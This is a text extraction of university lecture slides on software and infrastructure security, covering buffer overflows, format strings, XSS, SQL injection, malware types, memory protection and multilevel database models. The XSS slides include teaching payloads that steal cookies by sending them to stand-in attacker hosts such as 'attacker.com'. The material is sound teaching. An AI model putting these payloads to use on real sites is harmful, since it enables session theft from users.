INFRASTRUCTURE

SECURITY

MODULE 2
SOFTWARE SECURITY

PROF. SANKETI RAUT

 Software security

 Software security is an idea implemented to

protect software against malicious attack and other
hacker risks so software continues to function
correctly under such potential risks.
 Security is necessary to provide integrity,
authentication and availability.
software vulnerabilities
vulnerabilities

SPR
 Buffer Overflow

Buffer is a temporary area for data storage.

 You know that a certain amount of a memory is allocated

for every code you write.
 You need to take care of the memory before you write any
program.
SPR
 Buffer Overflow : Consider a situation

Suppose you are filling a form on a website or trying to

login

SPR
 Buffer Overflow

Depending on what resides in memory at location the

buffer overflow:
 Might overwrite user data or code
 Might overwrite system data or code
Space for declared variables is in many languages
allocated on the stack ,together with return addresses.
 Buffer Overflow

 So buffer overflow is a condition when a program writes

more data to the memory then it is actually supposed to
take.
 buffer overflow can challenge the integrity of the server
or system.
 Buffer overflow is a example of bad programming.
 It is generally seen in c or c++ language.
Example of buffer overflow
1.
char buff[10];
buff[10] = 'a';
 Format string vulnerability

 What are format strings?

SPR
Format string vulnerability
 Format String Vulnerability

Some format parameters

Format String Vulnerability : example

SPR
 Format String Vulnerability : example

Safe Code
The line printf("%s", argv[1]); in the example is safe, if you compile the program and
run it:
./example "Hello World %s%s%s%s%s%s"
The printf in the first line will not interpret the “%s%s%s%s%s%s” in the input string, and
the output will be: “Hello World %s%s%s%s%s%s”

SPR
 Format String Vulnerability : example

Vulnerable Code
The line printf(argv[1]); in the example is vulnerable, if you compile the program
and run it:
./example "Hello World %s%s%s%s%s%s"
The printf in the second line will interpret the %s%s%s%s%s%s in the input string
as a reference to string pointers, so it will try to interpret every %s as a pointer to a
string, starting from the location of the buffer (probably on the Stack). At some
point, it will get to an invalid address, and attempting to access it will cause the
program to crash.
SPR
Buffer overflow vs. format string

SPR
 Cross site scripting(XXS)

 It is web application vulnerability.

 Cross site scripting(XSS) is a code injection attack executed

on the client side of a web application.

 Attacker injects malicious script through web browser.

 The malicious script is executed when the victim visits the

web page or web server

 Steals cookies, session tokens and sensitive information.

 Website allows script to run in users input.

Cross Site Scripting (XSS)

SPR
How does XSS work?

SPR
 Reflected XSS
 Cross-site scripting (XSS) is a web application vulnerability that permits
an attacker to inject code, (typically HTML or JavaScript), into the contents
of an outside website. When a victim views an infected page on the website,
the injected code executes in the victim’s browser.

SPR
 Reflected XSS

 Reflected XSS- where the malicious script comes from

the current HTTP request.

 Examples of reflected cross-site scripting attacks include

when an attacker stores malicious script in the data sent
from a website’s search or contact form.

SPR
Stored XSS
 Stored XSS

 Stored XSS- where the malicious script comes from

the website's database.

 The attacker adds the following comment:

Great price for a great item! Read my review here

<script src=”http://hackersite.com/authstealer.js”>
</script>.

SPR
DOM-based XSS

SPR
 DOM-based XSS

 DOM-based XSS- where the vulnerability exists in

client-side code rather than server-side code.

 An example of DOM-based cross-site scripting

attack would be when the website changes the
language selection from the default one to one
provided in the URL.
 example of DOM-based cross-site scripting

1. Hey user, check this out:

http://website.com/search?keyword=<script>window.location='http://a
ttacker.com/?cookie='+document.cookie</script>

2. GET
http://website.com/search?keyword=<script>window.location='http://a
ttacker.com/?cookie='+document.cookie</script>

3. The website returns a response without the search string in the HTML
body
<html>
<h1> You Searched for:</h1>
<div id ="searchquery"> </div>
<script>
var keyword = location.search.substring(3);
document.querySelector('searchquery').innerHTML = keyword;
<script>
</html>

SPR
 example of DOM-based cross-site scripting

4. The HTML added is the malicious code that steals the user’s cookie

<html>
<h1> You Searched for:</h1>
<div id
="searchquery"><script>window.location='http://attacker.com/?coo
kie='+document.cookie</script> </div>
<script>
var keyword = location.search.substring(3);
document.querySelector('searchquery').innerHTML = keyword;
<script>
</html>

5. The browser executes the new code and sends a get request to the
attacker’s server with the user’s cookie.

GET "http://attacker.com/?cookie=user-cookie"
 SQL injection attack (SQLi)

 SQL injection (SQLI) is an injection attack where an

attacker can execute malicious SQL statements that
control a web applications database server.

 Since an SQL injection vulnerability could possibly

affect any website or web application that makes use
of an sql based database ,the vulnerability is one of
the oldest vulnerability.
SQL injection attack (SQLi)

SPR
How does SQLi work?
How does SQLi work?

SQL injection based on user input

SQL injection based on cookies

SQL injection based on HTTP headers

Second-order SQL injection
 SQL Injection

 Is a code injection technique that exploits a security

vulnerability occurring in the data base layer of an application .

 The vulnerability is present when user input is either

incorrectly filtered for string literal escape characters
embedded in SQL statements or user input is not strongly
typed and there by unexpectedly executed.

 SQL injection is subset of an unverified user input vulnerability

and the idea is to convince the application to run SQL code that
was not intended.

 It is an instance of a more general class of vulnerabilities that

can occur whenever one programming /scripting language is
embedded inside another.
SPR
Types of SQL Injection (SQLi)

SPR
 Notable SQL Injection Vulnerabilities

 Tesla vulnerability
 Cisco vulnerability
 Fortnite vulnerability
 How to prevent against SQL Injection attacks

1. User input should never be trusted

2. Stored procedures
3. Prepared statements
4. Regular expressions
5. Database connection user access rights
6. Error messages

SPR
 Malware

 Malware or malicious software is any program or file

that is harmful to a computer user.

 The main source for malware is internet or offline.

And the main objective is to steal sensitive data.

 Malware is the collective name for a number of

malicious software variants, including
viruses, ransomware and spyware. Types of malware
can include computer viruses,worms,trojan horses,
and spyware.
Malware Types

SPR
MALWARE classification

Remote
Traditional Autonomous
Controlled

Virus Adware Ransomware

Worm Rootkit Bots

Logic Bomb Key logger Spyware

Trojan Horse
SPR
 Virus

 Attach itself to a host (often a program) and replicate itself

 Self-replicating code
 Alters normal code with “infected” version

 Operates when infected code executed

If spread condition then
For target files
if not infected then alter to include virus
Perform malicious action
Execute normal program
 Viruses phases

 Piece of software that infects programs

 modifying them to include a copy of the virus
 so it executes secretly when host program is run
 Specific to operating system and hardware
 taking advantage of their details and weaknesses
 A typical virus goes through phases of:
 dormant: idle
 propagation: copies itself to other program
 triggering: activated to perform functions
 execution: the function is performed

SPR
 1. Boot Sector Virus – This type of virus infects the master boot
record and it is challenging and a complex task to remove this
virus and often requires the system to be formatted. Mostly it
spreads through removable media.
2. Direct Action Virus – This is also called non-resident virus, it
gets installed or stays hidden in the computer memory. It stays
attached to the specific type of files that it infect. It does not affect
the user experience and system’s performance.
3. Resident Virus – Unlike direct action viruses, resident viruses
get installed on the computer. It is difficult to identify the virus
and it is even difficult to remove a resident virus.
4. Multipartite Virus – This type of virus spreads through
multiple ways. It infects both the boot sector and executable files
Viruses 5.
at the same time.
Polymorphic Virus – These type of viruses are difficult to
identify with a traditional anti-virus program. This is because the
polymorphic viruses alters its signature pattern whenever it
replicates.
6. Overwrite Virus – This type of virus deletes all the files that it
infects. The only possible mechanism to remove is to delete the
infected files and the end-user has to lose all the contents in it.
Identifying the overwrite virus is difficult as it spreads through
emails.
7. Spacefiller Virus – This is also called “Cavity Viruses”. This is
called so as they fill up the empty spaces between the code and
hence does not cause any damage to the file.
 Spreads without user
interaction
Worms Spreads over the
network
Self Replicating

SPR
 Worm

Self-replicating malware that does not require a host

program
 Propagates a fully working version of itself to other
machines
 Carries a payload performing hidden tasks
 Backdoors, spam relays, DDoS agents; …
 Phases
 Probing  Exploitation  Replication  Payload
 Worm

 Worms get their name from the way they infect

systems. Starting from one infected machine, they
weave their way through the network, connecting to
consecutive machines in order to continue the
spread of infection.

 This type of malware can infect entire networks of

devices very quickly.
 1. Computer Worm
2. Bot worm
Worm types
3. Email worms
4. Internet worm

SPR
 More recent worm attacks

 Code Red
 July 2001 exploiting MS IIS bug
 probes random IP address, does DDoS attack
 consumes significant net capacity when active
 360,000 servers in 14 hours

 Code Red II variant includes backdoor: hacker controls the

worm
 SQL Slammer (exploited buffer-overflow vulnerability)
 early 2003, attacks MS SQL Server
 compact and very rapid spread
 Mydoom (100 M infected messages in 36 hours)
 mass-mailing e-mail worm that appeared in 2004
 installed remote access backdoor in infected systems
Difference Between Virus And Worms

SPR
 Trojan horse

 A trojan is a program that cannot reproduce itself but

masquerades as something the user wants and tricks them into
activating it so it can do its damage and spread.

 The Trojan horse at first glance will appear to be a useful software

but will actually do damage once installed or run on your system.

 The name is a reference to the Greek legends of the Trojan war.

Legend tells how the Greeks tricked the Trojans into breaking
their defense wall to take a wooden horse, filled with the bravest
of Greek soldiers, into their citadel. In the night, the soldiers
descended and signaled their troops that the way in was now
clear, and Troy was captured.

SPR
  Backdoor Trojan
 Distributed Denial of Service
(DDoS) attack Trojan
Common  Downloader Trojan
types of  Game-thief Trojan
 Mail finder Trojan
Trojan  Fake AV Trojan
malware  Ransom Trojan
 Remote Access Trojan
 Rootkit Trojan
 SMS Trojan
 Trojan banker
 Trojan IM
Trojan Horse Malware Examples
How to Detect Trojans in Your Organization

 Endpoint protection platforms

 Web application firewall (WAF)
 Threat hunting
 Triaging user complaints

SPR
 Logic bombs

 a set of instructions secretly incorporated into a program

so that if a particular condition is satisfied they will be
carried out, usually with harmful effects.

 Embedded in legitimate programs

 Activated when specified conditions met

 E.g.,presence/absence of some file; Particular
date/time or particular user

 When triggered, typically damages system

 Modify/delete files/disks
Logic bombs- working
 Rootkit

 A rootkit is software that enables continued privileged

access to a computer while actively hiding its presence
from administrators by subverting standard operating
system functionality or other applications.

 Emphasis is on hiding information from administrators’

view, so that malware is not detected
 E.g., hiding processes, files, opened network connections, etc

 Example: Sony BMG copy protection rootkit scandal

 In 2005, Sony BMG included Extended Copy Protection on music
CDs, which are automatically installed on Windows on CDs are
played.
SPR
 Types of Rootkits

 User-level rootkits
 Kernel-level rootkits
 Bootkits
 Firmware rootkits
 Rootkit hypervisors
 Bots

 A bot is a software application that is programmed to do

certain tasks.
 Bots are automated, which means they run according to
their instructions without a human user needing to start
them up. Bots often imitate or replace a human user's
behavior.
 Botnets are networks of computers infected
by malware (such as computer viruses, key loggers and
other malicious software) and controlled remotely by
criminals, usually for financial gain or to launch attacks
on websites or networks.
Operating system
security
 1. Fencing
2. Relocation
Memory and 3. Base/Bounds
Address Registers
Protection
4. Segmentation

SPR
 Fence

 This is the simplest form of memory protection.

 it was introduced in single user operating system.

 Memory protection is a way to control memory access rights on a

computer, and is a part of most modern instruction set architectures
and operating systems.

 The main purpose of memory protection is to prevent a process

from accessing memory that has not been allocated to it.

 The fence was a predefined memory address, enabling the operating

system to reside on one side and the user to stay on the other.
 Fencing

0
Hardware
Address
Limitation Operating
System
n
n+1
1. Fixed Address
2. Hardware Register (Fence Register) User
Program
Space
High
SPR
 Fence Register

 Implementation of fence is very restrictive.

 So another implementation of fence uses a hardware
register ,called as fence register.
 These issues were addressed with the creation of a
fence register, a type of hardware register.
 A fence register is more flexible and allows for a
dynamic fence that can resize and move as needed.
Fence Register

SPR
 Fence Register

 In this implementation, the operating system and user data

are assigned to different sections of memory, the locations
marked with integers.
 When an action or modification is made above a certain
integer bound this is recognized as user input and the
modification is accepted.
 When the action falls below a certain bound it is viewed as
an action to affect the operating system; unless proper
permissions are provided this action will fail and output an
error message.
 Relocation

 Relocation is important so the operating system knows where data is stored

and can access it.

 Ideally programs/data would start at address 0 and go up, and if an

operating system is a fixed size the programmer can know at which address
to begin.

 However, the operating system can change in size from version to version,
and it would be extremely difficult and time consuming to manually update
the address location.

 By adding a relocation factor to each address for the program, the system
can automatically update the addresses as needed.

 Relocation is the process of taking a program written as if it began at

address 0 and changing all addresses to reflect the actual address at which
the program is located in memory.

SPR
Relocation

SPR
Base/Bounds Registers
 Segmentation

 Segmentation, involves the simple notion of dividing a

program into separate pieces.

 Each segment has a unique name. A code or data item

within a segment is addressed as the pair <name, offset>,
where name is the name of the segment containing the
data item and offset is its location within the segment .

 File system also called as file management system is a

storage mechanism.

 Any place that a computer or other electronic device

stores data employs some type of file system.
 Segmentation
Name, offset SEG_A

Main

SEG_A

DATA_SEG
Physical
SUB Placement of
Program
Main

DATA_SEG

Logical SUB
Arrangement
of Program
SPR
 1. FAT32
File
2. NTFS
Protection
Mechanism
 File mechanism

 Every operating system like windows,linux,max has

its own file system.

 There are multiple types of file systems like

FAT12,FAT 16,FAT 32 and NTFS.

SPR
FAT 32 and NTFS structure
 NTFS partition

 The structure of NTFS is mentioned in a table.

 After NTFS partition is created ,MFT as well as MFT
mirror will be generated.
 MFT includes
MFT
MFT mirror
Log file
Volume
Root
Bitmap
Badclus
File Protection Mechanism

SPR
File Protection Mechanism
File Protection Mechanism
USER AUTHENTICATION
LINUX vs WINDOWS

SPR
LINUX vs WINDOWS
Database Security
 1. Database Security
Requirements
2. Reliability and
Integrity
3. Sensitive Data
Database 4. Inference Attacks
Security

SPR
Database Security

SPR
 Database Security

 Data base security refers to the collective measures

used to protect and secure a database from
illegitimate use and malicious threats and attacks.

 Database security refers to the range of tools,

controls, and measures designed to establish and
preserve database confidentiality, integrity, and
availability.
Database Security: need

SPR
Database Security Requirements
1. Physical Database
Integrity
2. Logical Database
Integrity
3. Element Integrity
4. Auditability
5. Access Control
6. User Authentication
7. Availability

SPR
Database Security Requirements
 Physical Database Integrity:
 the data of the database are immune from physical
problems, such as power failures, and someone can
reconstruct the database if it is destroyed through a
catastrophe.
 Physically securing storage media
 Regular backups

 Logical Database Integrity:

 the structure of database is preserved. With logical
integrity of a database, a modification to the value of one
field does not affect other fields.
 Reconstruction ability
 Maintain a log of transaction.

SPR
Database Security Requirements
 Element Integrity:
 The data contained in each element are accurate.
 Field check
 Allows only acceptable values.
 Access control
 Allows only authorized users to update element.
 Collection and control of data at one central source.
 Change log
 Lists every change made to the database(original + modified)
 Obtain original eligibility value from log and correct the
database.

 Auditability:
 it is possible to track who or what has accessed/ modified
elements in the database.
 Log read/write in database.

SPR
1. Database Security Requirements
 Access Control:
 A user is allowed to access only authorized data and
different users can be restricted to different modes of
access.
 Logical separation by user access privileges(view , relation,
field, record / at element level)
 Modes of access

 User Authentication:
 Every user is positively identified – both for the audit trail
and for permission to access certain data.
 Separate from OS and Rigorous.

 Availability:
 Users can access the database in general and the data for
which they are authorized.
 Right data at Right user at Right time.
SPR
 As a Whole
Database Authentication

Specific
relations or
2. Reliability Element
values
Proper
and Access
Control

Integrity
Prevent
insertion of
Accuracy improper
values.
Auditing

SPR
3. Sensitive
Data

SPR
  An Inference Attack is a data
mining technique performed by
analysing data in order to
illegitimately gain knowledge about
a subject or database
4. Inference
Attack

SPR
4. Inference Attack: example

SPR
4. Inference Attack: example

SPR
 There are 2 ways by dealing with the threat of disclosure by
inference

1. Inference detection during database design

2. Inference detection at query time
 Multilevel Database Security

 Multilevel security is a security policy that allows you to classify objects

and users based on a system of hierarchical security levels and a system
of non-hierarchical security categories.

 Multilevel databases provides data security by classifying the data in

relation with the user’s access type.

 Data tables(rows + columns) (tuples and attributes)

 Data classification  Access class
 Each attribute has classification attribute
 Tuple classification(additional attribute)  identifies the security
classification of each tuple.

SPR
 Multilevel Database Security

 R(A1; C1;...; An; Cn; TC), where

 each Ai is a data attribute,
 each Ci is a classification attribute for Ai,
 TC is the tuple-class attribute.
 The primary data attribute is denoted as PK and
 its corresponding classification attribute can be denoted as CPK.

 the multilevel security hierarchy has four levels of increasing

sensitivity. These levels, from lowest to highest, are unclassified (U),
confidential (C), secret (S), and top secret (TS).

 Data in relational multilevel database security are labeled with their

own security classification. Users who need to access data should have
the appropriate security classification level.
Multilevel Database Security
 Polyinstantiation

 Polyinstantiation : two or more tuples in multilevel

relation with same primary key.

 Polyinstantiation occurs in the following two

situations:
 •Invisible polyinstantiation can occur when a user with a low
security level inserts data in an attribute that already contains
data with a higher security level.

 Visible polyinstantiation can occur when a user with a high

security level inserts data in an attribute that already contains
data at a lower security level.

SPR
 Polyinstantiation: Types

 Entity polyinstantiation:
 occur when a relation contains more than one tuple with the
same primary key values, but with different access class values
for the primary key.

 Attribute polyinstantiation:
 occur when a relation contains two or more tuples with an
identical primary key and its security level values, but with
different values for one or more remaining attributes
 Sea View model

 In this secure data view model(sea view model),security levels are

assigned to each data element in the attributes of a tuples in a
relation.

 In a sea view model, data are stored in a set of single level fragments
and the multilevel relations are implemented as views over these
single-level relations
 Sea View model

 There are two algorithms that are used in the

implementation of the sea view model
 the decomposition algorithm divides the multilevel relation
into single level fragment.
 the recovery algorithm reconstructs the original multilevel
relation from the fragments.

 decomposition of the multilevel relations into single-

level ones : fragmentation: horizontal and vertical.

SPR
 Sea View model

 Thus, the multilevel relation in Table will be stored as five

single-level fragments (one primary key group relation and
four attribute group relations), as shown in Table
8
 Sea View model: limitations

 Repeated joints
 Spurious tuples
 Incompleteness
 Left outer joins
 Jajodia-Sandhu Model

 This model is derived from the sea view model.

 It modifies the algorithm that decomposes a multilevel relation into

single-level fragments and it also modifies the recovery algorithm
that reconstructs the original multilevel relation.

 In the Jajodia–Sandhu model, the decomposition algorithm uses only

horizontal fragmentation since no vertical fragmentations are required.
 Jajodia-Sandhu Model

For example, the relation in Table 8 will be decomposed into two single-level
fragments, as shown in Table

9
7
 Jajodia-Sandhu Model: limitations

 Semantic ambiguity
 Operational incompleteness

SPR
 Smith- winslett Model

 set of ordinary relational databases where all the databases

share the same schema

 No security at the level of each single attribute

 security level can be assigned only to the primary key

attributes and the tuples as a whole

 multilevel relational scheme :

 R(APK, CPK, A1..., An,TC) Where,
 Apk is denoted as the primary key data attribute,
 Cpk is the primary key classification attribute that contains the security level
of the primary key data attribute,
 A1...An is denoted as the data attributes, and
 TC is denoted as the tuple classification
Smith- winslett Model

SPR